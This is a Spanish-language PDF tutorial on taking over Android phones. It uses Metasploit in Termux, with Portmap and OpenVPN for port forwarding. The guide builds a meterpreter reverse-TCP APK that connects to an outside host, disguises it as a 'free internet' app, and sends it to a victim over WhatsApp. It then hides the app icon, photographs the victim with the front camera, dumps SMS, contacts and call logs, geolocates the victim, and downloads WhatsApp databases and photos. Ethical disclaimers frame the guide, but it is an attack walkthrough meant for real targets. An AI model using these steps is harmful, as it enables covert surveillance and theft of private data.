Вы находитесь на странице: 1из 76

1

Hacking en Android.
Parte 2
Metasploit y Portmap.

By Unknown

1
1

Contenido
Introducción 3
Metasploit Framework 5
Características principales 6
Instalando Metasploit en Termux 7
Portmap 12
¿Qué es Portmap? 13
Configurando Portmap 14
OpenVpn 28
¿Qué es OpenVpn? 28
Configurando OpenVpn 29
¡¡¡Manos a la obra!!! 34
¿Qué es un payload? 35
Creando nuestro propio Payload 37
¡Arrancando nuestro ataque! 50

2
3
Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Introducción

Android es actualmente uno de los sistemas


operativos más populares del mundo, aplicado por las
más variadas marcas de tables y smartphones para sus
dispositivos.

En esta ocasión lo que les traemos es una guía


completa de como vulnerar este sistema, utilizando 3
herramientas, Metasploit Framework, Portmap y
OpenVpn, para realizar un ataque fuera de LAN, todo
esto explicado mas a detalle y paso a paso en todo
lo contenido en este pdf.

Desde ya aclaro que este contenido está hecho en su


totalidad con fines éticos y no me hago responsable
del uso que se le pueda dar a la información que
aquí se entrega.

25/09/2019 Unknownlb 3
4 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Metasploit Framework

Metasploit framework es un proyecto de código


abierto que nos ayuda a investigar las
vulnerabilidades de seguridad

es una herramienta desarrollada en Perl y Ruby en


su mayor parte, que está enfocada a auditores de
seguridad y equipos Red Team y Blue Team.

Red Team es el equipo ofensivo o encargado del


hacking ético, que hace pruebas de intrusión,
mientras que el Blue Team es el equipo que lleva
a cabo la securización y toda la parte defensiva.

25/09/2019 Unknownlb 4
5 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Características principales

Es una herramienta muy completa que tiene muchísimos


exploits, que son vulnerabilidades conocidas, en las
cuales tienen también unos módulos, llamados
payloads, que son los códigos que explotan estas
vulnerabilidades.
También dispone de otros tipos de módulos, por
ejemplo, los encoders, que son una especie de
códigos de cifrado para evasión de antivirus o
sistemas de seguridad perimetral.
Otra de las ventajas de este framework es que nos
permite interactuar también con herramientas
externas, como Nmap o Nessus,
Además, ofrece la posibilidad de exportar nuestro
malware a cualquier formato, ya sea en sistemas Unix
o Windows.

25/09/2019 Unknownlb
6 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Instalando Metasploit en Termux

Lo primero que haremos en esta ocasión será


dirigirnos a nuestro termux y abrirlo.

25/09/2019 Unknownlb 6
7 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Y procederemos a instalar los repositorios


necesarios para el funcionamiento de Metasploit,
con el siguiente comando:

“pkg install unstable-repo”

25/09/2019 Unknownlb 7
8 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Primeramente, nos saldrá algo como esto:

-Vamos a esperar que complete su instalación, la


cual es bastante rápida y al finalizar debería
salirnos algo como lo mostrado a continuación:

25/09/2019 Unknownlb 8
9 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez hayamos terminado con los


repositorios, procederemos inmediatamente a la
instalación de Metasploit, esto con el
siguiente comando:

“pkg install metasploit”

25/09/2019 Unknownlb 9
10 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Deberemos ser pacientes pues metasploit demora


un poco en instalarse, el tiempo estimado es de
10 a 20 minutos dependiendo de la velocidad de su
internet, se recomienda descargarlo con wifi
puesto qué pesa 1.5 gb, y no salirse de termux
durante la instalación para evitar cualquier tipo
de errores.

-Una vez ya haya concretado su instalación, nos


saldrá algo como esto:

25/09/2019 Unknownlb 10
12 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Ahora metasploit está listo para ser usado, pero


antes de ver su uso, pasaremos a configurar
Openvpn y Portmap, pues serán necesarios para lo
que haremos más adelante.

25/09/2019 Unknownlb 11
13 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Portmap

¿Qué es Portmap?

-Portmap es una página web, que nos permitirá


realizar port forwarding (reenvio o
redireccionamiento de puertos) en palabras
simples, nos permite abrir los puertos de nuestra
red, sin necesidad de hacerlo manualmente
accediendo a las configuraciones del router, esto
con el fin de sacar nuestro ataque fuera de LAN.

LAN: Local Área Network (Red de área local) es


una red que conecta los ordenadores en un área
relativamente pequeña y predeterminada (como una
habitación, un edificio, o un conjunto de
edificios).
Fuente:
https://www.masadelante.com/faqs/lan

WAN: Wide Área Network (Red de Área Amplia) las


conexiones informáticas de mayor envergadura, es
decir, las más abarcativas y de mayor velocidad,
que cubren una extensa porción geográfica del
planeta, cuando no al mundo entero.
Fuente: https://concepto.de/red-
wan/#ixzz60DRia11N

25/09/2019 Unknownlb 12
14 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Configurando Portmap

-Lo primero que haremos será dirigirnos a nuestro


navegador, de preferencia Google Chrome y vamos a
escribir lo siguiente:

“portmap.io”

25/09/2019 Unknownlb 13
15 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que haremos, será apretar en donde


dice “registrarse” para crearnos una cuenta.

-En el registro, se nos va a pedir que ingresemos


una dirección de correo electrónico la cual puede
ser real, o como en mi caso, temporal generada
por alguna plataforma online, yo les recomiendo
la siguiente página:

25/09/2019 Unknownlb 14
16 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

https://emailtemporal.org

-La cual para mi es una de las mejores y mi


favorita, al momento de generar direcciones de
correo temporales y anónimas.

-Rellenamos los campos que nos piden, y aceptamos


los términos y condiciones de uso, y damos en
registrar.

25/09/2019 Unknownlb 15
17 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Nos enviara a nuestro correo un email de


confirmación, el cual vamos a confirmar.

-Una vez hemos confirmado el correo, volveremos a


la página de Portmap y apretaremos arriba a la
derecha en el cuadradito gris y apretaremos donde
dice configuraciones.

25/09/2019 Unknownlb 16
18 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez estemos en la pestaña de configuraciones


lo siguiente será apretar en donde dice “crear
nueva configuración”

25/09/2019 Unknownlb 17
19 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Seguido de esto, lo que recomiendo es poner el


navegador en modo escritorio.

25/09/2019 Unknownlb 18
20 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que haremos, será completar los


campos que nos muestra a continuación.

En nombre, pondremos algo a nuestra elección,


pero tratando de que sea simple, en tipo
pondremos “openvpn”, en protocolo pondremos
“tcp”, y en comentario dejaremos en blanco.

25/09/2019 Unknownlb 19
21 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

25/09/2019 Unknownlb 20
22 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Luego, de haber completado estos campos, daremos


en “generar” o “generate” (depende del idioma en
que estemos viéndolo) y se nos va a generar una
key que es la que necesitaremos para sacar el
ataque fuera de la red LAN.

-Luego de esto daremos en Download o descargar y


se nos va descargar la key, en un archivo que
tendrá el nombre que le pusimos anteriormente y
con una extensión “.ovpn”, este debemos guardarlo
pues lo ocuparemos más adelante, y finalmente
daremos en “crear” para guardar esta
configuración.

25/09/2019 Unknownlb 21
23 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que haremos será subir hasta el


inicio y apretar donde dice “Reglas de mapeo”.

-Y en una vez estemos en las reglas de mapeo,


daremos en “crear nueva regla”.

25/09/2019 Unknownlb 22
24 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Luego lo que haremos será dirigirnos a donde


dice “nombre del host”, seleccionaremos el
apartado que dice “portmap.host” y lo
cambiaremos a “portmap.io”, en donde dice
“puerto en tu pc”, pondremos el puerto 9090 y
en “ip permitidas” dejaremos en blanco,
finalmente daremos en “crear”.

25/09/2019 Unknownlb 23
25 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

25/09/2019 Unknownlb 24
26 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-En el caso de que nos arroje un error, como el


que se muestra a continuación:

-Lo único que haremos será volver a cargar la


página, y ya podremos crear la regla sin
problemas.

25/09/2019 Unknownlb 25
27 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez ya creada esta regla debemos aprendernos


o anotar en algún lado el numero de 5 dígitos
enmarcado en la imagen, pues lo usaremos mas
adelante, en mi caso es “45953”, para cada
usuario es distinto.

25/09/2019 Unknownlb 26
28 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

OpenVpn

¿Qué es OpenVpn?

OpenVPN es una herramienta de conectividad basada


en software libre: SSL (Secure Sockets Layer),
VPN Virtual Private Network (red virtual
privada).

OpenVPN ofrece conectividad punto-a-punto con


validación jerárquica de usuarios y host
conectados remotamente.

Aclaración: si bien Openvpn, cumple si función


como vpn, únicamente lo utilizaremos para el
reenvío de puertos, pues al ser un vpn gratuito,
guarda registros de todo lo que hagamos, y no nos
da un anonimato completo, para anonimato siempre
se recomienda un vpn de paga, en este caso
recomendamos ExpressVpn, para una navegación más
segura.

25/09/2019 Unknownlb 27
29 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Configurando OpenVpn

-Lo primero que haremos será dirigirnos a la play


store y descargar e instalar la app llamada
“OpenVpn Connect”.

25/09/2019 Unknownlb 28
30 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-La primera vez que abramos la app, nos


encontraremos con esto:

-Y seleccionaremos la opción 3 que dice “OVPN


Profile”.

25/09/2019 Unknownlb 29
31 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Seguido de esto nos tocará navegar por los


directorios de nuestro dispositivo para buscar el
archivo que contiene la key descargada
anteriormente desde Portmap, que, por lo general
se encuentra en nuestra carpeta de descargas.
Vamos hacia ella, la seleccionamos y le damos a
“import”.

25/09/2019 Unknownlb 30
32 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Nos saldrá algo como esto y le daremos en añadir


(ADD).

25/09/2019 Unknownlb 31
33 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Finalmente ya tendremos listo y configurado


OpenVpn para que en conjunto con Portmap, realice
port forwardin y podamos sacar nuestro ataque
fuera de la red LAN.

-Ahora estamos listos para poder crear nuestro


payload e infectar un dispositivo Android.

25/09/2019 Unknownlb 32
34 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

¡¡¡Manos a la obra!!!

25/09/2019 Unknownlb 33
35 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

¿Qué es un payload?

Las vulnerabilidades o errores presentes en


cualquier software pueden ser aprovechadas para
producir efectos inesperados en los equipos, una
vez descubierto ese fallo se desarrollan pequeños
programas (exploits) para forzar de forma
específica ese error en el sistema, Además de
conseguir que el software produzca este error lo
ideal sería poder aprovecharlo para que el equipo
realice las funciones que nosotros deseemos.

Esa parte del software que nos brinda una función


ante un error es el Payload.

Un mismo payload puede ser utilizado por


distintos exploits y un mismo exploit puede
utilizar varios payloads. Metasploit tiene sobre
1800 exploits, y más de 1000 payloads. Existen
diferentes payloads para cada vulnerabilidad.

En esta ocasión trabajaremos con un payload tipo


Meterpreter, el cual es un payload bastante
conocido y cullo nombre proviene de las palabras
“meta” e “interpreter”. Es multifacética y se
ejecuta en memoria a abajo nivel, es decir, que
aporta una indetectabilidad bastante
considerable, ya que los sistemas de protección
se encuentran varias capas por encima. Es una de
las Shell por defecto de Metasploit Framework y
tiene muchas opciones y subcomandos propios, por

25/09/2019 Unknownlb 34
36 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

lo que resulta una muy buena herramienta para


auditores de seguridad informática.

-Ya teniendo esto en cuenta, vamos a proceder a


crear sin más, nuestro payload.

25/09/2019 Unknownlb 35
37 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Creando nuestro propio Payload.

-Lo primero que haremos será ir a OpenVpn y


encenderlo.

-Seguido de eso, abriremos nuestro Termux y vamos


a arrancar Metasploit con el siguiente comando:

25/09/2019 Unknownlb 36
38 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“msfconsole”

-Va a quedarse sin hacer nada por unos minutos


y después se nos mostrará algo como esto:

25/09/2019 Unknownlb 37
39 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Va a demorar un poco en iniciarse y debemos


tener paciencia, pero finalmente se nos mostrará
algo como esto:

25/09/2019 Unknownlb 38
40 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que haremos ahora, será deslizar


nuestro dedo desde el borde izquierdo de nuestra
pantalla hacia la derecha para abrir el menú de
ventanas, y apretaremos en donde dice “new
sessions” para abrir una ventana nueva.

25/09/2019 Unknownlb 39
41 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

25/09/2019 Unknownlb 40
42 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-En esta nueva pestaña lo que haremos, será


utilizar la herramienta de Metasploit llamada
“msfvenom” para crear al payload.

-bastará únicamente con escribir “msfvenom” + lo


siguiente:

“-p” con esto le diremos a msfvenom que queremos


crear un payload.

Luego, con “android/meterpreter/reverse_tcp”, le


estaremos diciendo que queremos que este payload
sea para Android y que además sea de tipo
meterpreter(meta-interpreter), y también le
indicamos que queremos que trabaje con el
protocolo tcp.

También le especificaremos el host con el


comando “LHOST=” y pondremos la ip que nos da
OpenVpn, la cual es “193.161.193.99”.

Y especificaremos el puerto con el comando


“LPORT=” y aquí agregaremos el numero de 5
dígitos que anteriormente dije, era importante
anotar en mi caso es “45953”

Luego con “R” diremos que queremos guardar este


payload.

25/09/2019 Unknownlb 41
43 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

y con “>” especificaremos la ruta en donde lo


guardaremos.

la cual será en este caso “/sdcard”.

Y luego de otro “/” añadiremos el nombre que le


daremos al payload, en este caso será
“internet_gratis”, seguido de su extensión, como
en este caso es para Android, será “.apk”
-Quedando todo finalmente así:

25/09/2019 Unknownlb 42
44 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Luego daremos enter y parecerá que nada ha


sucedido, deberemos ser pacientes y después de
unos minutos nos mostrará lo siguiente:

-Esto nos muestra las especificaciones de nuestro


payload y concluye entregándonos el peso de este,
que en mi caso son 1088 bytes, esto significa que
ya ha sido creado y con éxito.

25/09/2019 Unknownlb 43
45 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que haremos será poner a Metasploit


en modo escucha, ósea conectarlo a nuestro
payload y dejarlo a la espera de que alguna
victima se infecte con él.

Para esto volveremos a deslizar nuestro dedo


desde el borde izquierdo de la pantalla hacia la
derecha para abrir el menú de ventanas y regresar
a la ventana en donde teníamos abierto
Metasploit.

Una vez en Metasploit, vamos a iniciar el handler


que es el que nos permitirá conectarnos a nuestro
reverse payload.

Esto lo haremos con el comando:

“use multi/handler”

25/09/2019 Unknownlb 44
46 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Seguido de esto lo que haremos será setear o


especificar las características de nuestro
reverse payload.

25/09/2019 Unknownlb 45
47 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo primero que vamos a setear es el tipo de


payload y lo haremos con el siguiente comando:

“set payload android/meterpreter/reverse_tcp”

Y daremos enter.

25/09/2019 Unknownlb 46
48 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que setearemos será el host y esto


lo haremos con el siguiente comando + la
dirección ip que nos entregó OpenVpn, quedándonos
así:

“set LHOST 193.161.193.99”

25/09/2019 Unknownlb 47
49 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Lo siguiente que vamos a setear sera el puerto


que establecimos nosotros en la configuración de
Portmap, el cual era el puerto “9090”,
quedándonos así:

“set LPORT 9090”

-Ahora estamos listos para poner a Metasploit


en modo escucha!!!

25/09/2019 Unknownlb 48
50 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

¡Arrancando nuestro ataque!

Recomendación:
una vez que hemos puesto a Metasploit en modo
escucha, si pasa un lapso de tiempo mas o menos
prolongado, este expira la sesión y aunque la
victima instale nuestra apk mil veces, este no
nos mostrara nada, así que recomiendo que antes
de ponerlo en modo escucha, enviemos el apk a la
victima y nos aseguremos de que esta la va
instalar, así lo ponemos en modo escucha y no
esperaremos mas de 1 o 2 minutos hasta que la
víctima instale nuestra apk, lo que causara una
conexión exitosa entre Metasploit y el payload.

-Siguiendo entonces esa recomendación primero que


nada abriremos nuestro gestor de archivos
preferidos e iremos a nuestro almacenamiento
interno(sdcard) a buscar el apk creada
anteriormente.

25/09/2019 Unknownlb 49
51 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-En mi caso, la compartiré a través de WhatsApp


algún contacto.

25/09/2019 Unknownlb 50
52 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez ya estamos seguros de que nuestra


víctima, instalará nuestra apk, vamos devuelta a
metasploit y ahora si lo pondremos en modo
escucha con el comando:

“run”

25/09/2019 Unknownlb 51
53 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-y nuestro metasploit al fin ya estará en modo


escucha, esperando que la víctima, instale
nuestra apk y OJO, que no solo debe ser
instalada, deber ser abierta una vez, para poder
establecer la conexión entre el dispositivo
infectado y nuestro metasploit.

Nota: si la víctima se pone a abrirla a lo loco


una y otra vez nuestro metasploit se llenará de
sesiones abiertas y cerradas, pues al abrir una
vez, se abre la sesión, al volverla abrir se
cierra esta y se abre una nueva, y así
sucesivamente y no podremos hacer nada.

-Entonces Una vez la victima haya abierto el apk,


nos aparecerá un mensaje diciéndonos que la
sesión ha sido abierta y luego de aproximadamente
unos 2 minutos nos aparecerá la consola de
meterpreter para poder tomar control del
dispositivo y esto ser verá así:

25/09/2019 Unknownlb 52
54 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez nos aparezca entonces la consola de


comandos de meterpreter, lo primero que haremos
será ocultar el icono de nuestra app del menú de
aplicaciones de la victima para evitar una
desinstalación fácil por parte de esta y lo
haremos con el siguiente comando:

25/09/2019 Unknownlb 53
55 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“hide_app_icon”

Con ese comando entonces el icono de la app


desaparecerá del menú de la víctima y permanecerá
oculto.

-Lo siguiente que haremos será obtener


información básica del dispositivo con el
siguiente comando:

25/09/2019 Unknownlb 54
56 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“sysinfo”

-Lo siguiente que haremos a continuación será


tomar una selfie con la cámara delantera, y esto
lo haremos con el siguiente comando:

25/09/2019 Unknownlb 55
57 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“webcam_snap”

-Lo siguiente que haremos ahora será extraer sus


SMS y esto con el comando:

25/09/2019 Unknownlb 56
58 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“sms_dump”

-Lo siguiente que haremos ahora será extraer los


contactos y esto con el comando:

25/09/2019 Unknownlb 57
59 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“contacts_dump”

-Ahora extraeremos los registros de llamadas con


el comando:

25/09/2019 Unknownlb 58
60 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“calllog_dump”

-Ahora vamos a realizar una geolocalización para


saber las coordenadas de nuestra víctima, ojo que
esto no siempre funciona dependerá de si la
victima tiene activado o no el GPS, en mi caso
tuve suerte, para esto emplearemos el siguiente
comando:

25/09/2019 Unknownlb 59
61 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“geolocate”

-Nos arrojará la latitud y la longitud, de la


víctima, la cual al buscar en Google maps nos
mostrará su ubicación.

25/09/2019 Unknownlb 60
62 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

ubicación: Pilar, Buenos aires, Argentina

-Otra cosa que podemos hacer, es navegar por los


directorios del celular de la victima para ver
todo lo que tiene en sus carpetas, esto lo
haremos con el comando:

“shell”

-En cuanto lo ejecutemos, después de unos


minutos, nos dirá que se ha creado un proceso y
un canal, mostrándonos algo como esto:

25/09/2019 Unknownlb 61
63 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Una vez ya tengamos el proceso y el canal


creado, accederemos al almacenamiento interno del
dispositivo, esto lo hacemos usando los mismos
comandos que utilizamos en Linux y termux para
movernos, en este caso para ir al almacenamiento
interno, seria:

25/09/2019 Unknownlb 62
64 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“cd /sdcard”

-Y luego listamos para ver el contenido con:

“ls”

25/09/2019 Unknownlb 63
65 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Usando estos mismos comandos, podríamos por


ejemplo acceder a las copias de seguridad de
WhatsApp

25/09/2019 Unknownlb 64
66 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-O también a las fotos y videos de su cámara:

-Para salir de la shell, usaremos el siguiente


comando:

25/09/2019 Unknownlb 65
67 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

“exit”

-Si deseamos dejar un archivo en el celular de la


víctima, algún otro virus, persistencia o una
simple nota lo haremos con el comando “upload” +
la ruta en donde queremos dejar el archivo, en
este caso, el almacenamiento interno (sdcard).

Ejemplo:

“upload has_sido_hackeada_por_unknowns.txt
/sdcard”

-Daremos enter y el archivo será subido al


almacenamiento interno de nuestra víctima.

25/09/2019 Unknownlb 66
68 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Y para descargar un archivo o carpeta desde el


celular de la victima al nuestro, usaremos el
comando “download” + la ruta completa del
archivo, así:

25/09/2019 Unknownlb 67
69 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-En caso de que queramos descargar las copias de


seguridad de WhatsApp seria:

“download /sdcard/DCIM/Camera”

-En caso de que queramos descargar la carpeta de


la cámara seria:

“download /sdcard/WhatsApp/Databases”

25/09/2019 Unknownlb 68
70 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Después de esto se comenzará a descargar el


archivo o carpeta especificada y deberemos
tener paciencia pues esto demorará
dependiendo de la cantidad o el peso.

-Para finalizar Metasploit vamos a presionar:

“Ctrl + c”

O vamos a escribir:

“exit”

Hasta finalizar Metasploit por completo.

Ahora para finalizar, veremos como revisar


los archivos obtenidos de la víctima durante
el ataque.

25/09/2019 Unknownlb 69
71 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

¿Cómo vemos la información obtenida


durante el ataque?

-Para visualizar los archivos, la información o


las imágenes extraídas durante el ataque
simplemente, en el home de Termux, vamos a listar
con “ls”, y nos aparecerá todo lo obtenido.

25/09/2019 Unknownlb 70
72 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Como podemos ver, nos aparecen los contactos,


los registros de llamadas, y los mensajes
extraídos, además de las fotos sacadas por la
cámara delantera y la carpeta Databases que
descargamos con la copia de seguridad de
WhatsApp.

-Para revisar la carpeta con lo descargado,


únicamente entraremos en ella con el comando “cd”
+ el nombre de la carpeta.

Ejemplo:

“cd Databases”

-Y listaremos con “ls” para revisar el contenido.

25/09/2019 Unknownlb 71
73 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Para revisar los SMS, los contactos y los


registros de llamadas, al ser archivos de texto,
podemos leerlos con el comando “cat” + el nombre
del archivo.

25/09/2019 Unknownlb 72
74 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Ejemplo:

“cat sms_dump_20190922213815.txt”

-Para ver las imágenes, vamos a tener que


moverlas a la carpeta descargas, para poderlas
ver directamente desde la galería de nuestro

25/09/2019 Unknownlb 73
74 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

dispositivo, esto con el comando “mv” + el nombre


de la imagen + la ruta hacia donde la vamos a
mover.

Ejemplo:

“mv VnYwdcKz.jpg
/data/data/com.termux/files/home/storage/download
s”

25/09/2019 Unknownlb 74
75 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

-Luego solo vamos a nuestra galería o a nuestros


archivos en la carpeta Descargas, y podremos
visualizar las imágenes.

25/09/2019 Unknownlb 75
76 Parte 2

</Ʉ₦Ԟ₦Ø₩₦$> Metasploit y Portmap.

Conclusión

-Como hemos podido observar a través de la


práctica, lo enseñado en esta guía es algo
sumamente básico y nada del otro mundo, que
cualquier persona podría hacer, sin embargo,
también podemos darnos cuenta que con algo tan
simple como una apk, se puede hacer bastante, lo
mostrado en esta guía es netamente con el
objetivo de concientizar y prevenir, si bien se
mostro el alcance general de lo que se puede
llegar hacer, un verdadero pirata informático a
través de este mismo método podría, incluso
hackear una cuenta de WhatsApp, exponer datos o
fotos de carácter bastante privado o hacerle
algún daño bastante severo al dispositivo.

-Hemos aprendido que es Metasploit a rasgos


simples y de una manera general, no debemos
olvidar lo completo que es este Framework y tener
en cuenta que con él se pueden llegar a hacer
cientos de cosas, las cuales estaremos viendo
también más adelante, también aprendimos a hacer
port forwarding para salir fuera de nuestra red
LAN, siempre es importante que veamos mas allá de
lo evidente y tengamos un mayor alcance de las
cosas, pues lo enseñado aquí, puede ser utilizado
también para muchos otros tipo de ataques o
técnicas de hackeo.

25/09/2019 Unknownlb 76

Вам также может понравиться